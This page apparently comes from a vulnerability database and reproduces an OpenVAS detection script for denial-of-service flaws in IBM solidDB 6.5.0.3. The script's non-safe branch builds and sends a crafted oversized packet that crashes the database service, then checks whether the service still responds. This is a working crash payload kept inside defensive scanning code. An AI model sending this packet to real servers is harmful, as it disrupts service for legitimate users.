IBM solidDB Multiple Denial of Service Vulnerabilities
🗓️ 19 Oct 2010 00:00:00Reported by Copyright (C) 2010 Greenbone AGType
openvas🔗 plugins.openvas.org👁 24 Views
| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| IBM Solid Database 6.5 < 6.5.0.8 Multiple Denial of Service Vulnerabilities | 23 Feb 201200:00 | – | nessus | |
| IBM solidDB 6.5 < 6.5.0.8 Multiple Denial of Service Vulnerabilities | 23 Feb 201200:00 | – | nessus | |
| CVE-2010-4055 | 22 Oct 201022:00 | – | cve | |
| CVE-2010-4056 | 22 Oct 201022:00 | – | cve | |
| CVE-2010-4057 | 22 Oct 201022:00 | – | cve | |
| CVE-2010-4055 | 22 Oct 201022:00 | – | cvelist | |
| CVE-2010-4056 | 22 Oct 201022:00 | – | cvelist | |
| CVE-2010-4057 | 22 Oct 201022:00 | – | cvelist | |
| IBM solidDB 6.5.0.3 - Denial of Service | 15 Oct 201000:00 | – | exploitdb | |
| EUVD-2010-4032 | 7 Oct 202500:30 | – | euvd |
10
| Source | Link |
|---|---|
| securityfocus | www.securityfocus.com/bid/44158 |
| aluigi | www.aluigi.altervista.org/adv.htm |
# SPDX-FileCopyrightText: 2010 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if (description)
{
script_oid("1.3.6.1.4.1.25623.1.0.100861");
script_version("2023-10-27T16:11:32+0000");
script_tag(name:"last_modification", value:"2023-10-27 16:11:32 +0000 (Fri, 27 Oct 2023)");
script_tag(name:"creation_date", value:"2010-10-19 12:49:22 +0200 (Tue, 19 Oct 2010)");
script_cve_id("CVE-2010-4055", "CVE-2010-4056", "CVE-2010-4057");
script_tag(name:"cvss_base", value:"5.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
script_name("IBM solidDB Multiple Denial of Service Vulnerabilities");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/44158");
script_xref(name:"URL", value:"http://aluigi.altervista.org/adv.htm");
script_tag(name:"qod_type", value:"remote_analysis");
script_category(ACT_MIXED_ATTACK);
script_family("Denial of Service");
script_copyright("Copyright (C) 2010 Greenbone AG");
script_dependencies("gb_ibm_soliddb_detect.nasl");
script_mandatory_keys("IBM-soliddb/installed");
script_require_ports("Services/soliddb", 1315);
script_tag(name:"summary", value:"IBM solidDB is prone to multiple denial of service (DoS)
vulnerabilities.");
script_tag(name:"impact", value:"Attackers can exploit these issues to crash the affected
application, denying service to legitimate users.");
script_tag(name:"affected", value:"solidDB 6.5.0.3 is vulnerable, other versions may also be affected.");
script_tag(name:"solution_type", value:"WillNotFix");
script_tag(name:"solution", value:"No known solution was made available for at least one year
since the disclosure of this vulnerability. Likely none will be provided anymore.
General solution options are to upgrade to a newer release, disable respective features,
remove the product or replace the product by another one.");
exit(0);
}
include("byte_func.inc");
include("version_func.inc");
include("misc_func.inc");
include("port_service_func.inc");
port = service_get_port(default: 1315, proto: "soliddb");
function soliddb_alive() {
local_var soc1;
user = "DBA";
pass = raw_string(0x76, 0xce, 0xa5, 0x2d, 0x72, 0x4f, 0x6f, 0x02);
tcp = string("tcp ", get_host_name(), " ", port);
vt_strings = get_vt_strings();
id = vt_strings["default"] + "(" + this_host() + ")";
soc1 = open_sock_tcp(port);
if(!soc1)
return FALSE;
set_byte_order(BYTE_ORDER_LITTLE_ENDIAN);
req = raw_string(0x02, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x00) + mkdword(1) +
mkdword(strlen(tcp)) + tcp + mkdword(strlen(user)) + user +
mkdword(strlen(pass)) + pass + mkdword(4) + mkdword(3) +
mkdword(2) + mkdword(1) + mkdword(1) + mkdword(0) +
mkdword(strlen(id)+3) + raw_string(0x04) + mkword(strlen(id)) + id;
send(socket:soc1, data:req);
ret = recv(socket:soc1, length:128);
close(soc1);
if(!ret || isnull(ret))return FALSE;
if((strlen(ret) == 35 || strlen(ret) >= 27) && hexstr(substr(ret, 0, 6)) == "02000100000000" && hexstr(substr(ret, 6, 7)) == "0001") {
return TRUE;
}
return FALSE;
}
if(!soliddb_alive())
exit(0);
if(safe_checks()) {
if(!v = get_kb_item(string("soliddb/",port,"/version")))
exit(0);
if("Build" >< v) {
version = eregmatch(pattern:"^[^ ]+", string:v);
version = version[0];
} else {
version = v;
}
if(version_is_less_equal(version:version, test_version:"6.5.0.3")) {
security_message(port:port);
exit(0);
}
} else {
req = raw_string(0x02,0x00,0x00,0x00,0x00,0x11,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00);
for(i=0;i<20000;i++) {
req += raw_string(0x00,0xfc,0x3a,0x00);
}
req += raw_string(0x00);
soc = open_sock_tcp(port);
if(!soc)
exit(0);
send(socket:soc, data:req);
close(soc);
sleep(5);
if(!soliddb_alive()) {
security_message(port:port);
exit(0);
}
exit(0);
}
exit(0);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Oct 2023 00:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 25
EPSS0.0843